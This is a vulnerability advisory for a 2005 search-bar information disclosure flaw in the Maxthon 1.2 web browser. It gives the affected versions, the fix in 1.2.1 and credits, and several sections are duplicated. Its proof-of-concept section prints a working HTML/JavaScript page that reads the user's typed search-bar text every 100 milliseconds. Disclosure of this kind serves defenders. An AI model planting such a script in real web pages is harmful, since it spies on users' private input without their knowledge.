Maxthon Web Browser Search Bar Information Disclosure Vulnerability
BID:12898
Info
Maxthon Web Browser Search Bar Information Disclosure Vulnerability
| Bugtraq ID: | 12898 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 25 2005 12:00AM |
| Updated: | Mar 25 2005 12:00AM |
| Credit: | Discovery is credited to Aviv Raff <[email protected]>. |
| Vulnerable: |
Maxthon Maxthon 1.2 |
| Not Vulnerable: |
Maxthon Maxthon 1.2.1 |
Discussion
Maxthon Web Browser Search Bar Information Disclosure Vulnerability
Maxthon Web Browser is reported prone to an information disclosure vulnerability. This issue may allow an attacker to disclose search bar contents from an affected browser.
Information disclosed through the exploitation of this vulnerability may aid an attacker in carrying out other attacks against a vulnerable computer.
Maxthon Web Browser 1.2.0 is reported to be vulnerable to this issue. Prior versions may be affected as well.
Maxthon Web Browser is reported prone to an information disclosure vulnerability. This issue may allow an attacker to disclose search bar contents from an affected browser.
Information disclosed through the exploitation of this vulnerability may aid an attacker in carrying out other attacks against a vulnerable computer.
Maxthon Web Browser 1.2.0 is reported to be vulnerable to this issue. Prior versions may be affected as well.
Exploit / POC
Maxthon Web Browser Search Bar Information Disclosure Vulnerability
An exploit is not required.
The following proof of concept is available:
<html>
<head>
<title>Maxthon's Search Bar Information Disclosure PoC</title>
<script>
function sniff() {
try {
s.value=external.m2_search_text;
}
catch(e) {}
}
function body_onload() {
window.setInterval('sniff()',100);
}
</script>
</head>
<body onload="body_onload()">
Information typed in Maxthon's search bar will be displayed here: <input type="text" id="s" value='' readonly="true" />
</body>
</html>
An exploit is not required.
The following proof of concept is available:
<html>
<head>
<title>Maxthon's Search Bar Information Disclosure PoC</title>
<script>
function sniff() {
try {
s.value=external.m2_search_text;
}
catch(e) {}
}
function body_onload() {
window.setInterval('sniff()',100);
}
</script>
</head>
<body onload="body_onload()">
Information typed in Maxthon's search bar will be displayed here: <input type="text" id="s" value='' readonly="true" />
</body>
</html>
Solution / Fix
Maxthon Web Browser Search Bar Information Disclosure Vulnerability
Solution:
The vendor has released Maxthon 1.2.1 to address this issue.
Maxthon Maxthon 1.2
Solution:
The vendor has released Maxthon 1.2.1 to address this issue.
Maxthon Maxthon 1.2
References
Maxthon Web Browser Search Bar Information Disclosure Vulnerability
References:
References:
- Maxthon browser search bar information disclosure advisory (Aviv Raff)
- Maxthon Homepage (Maxthon)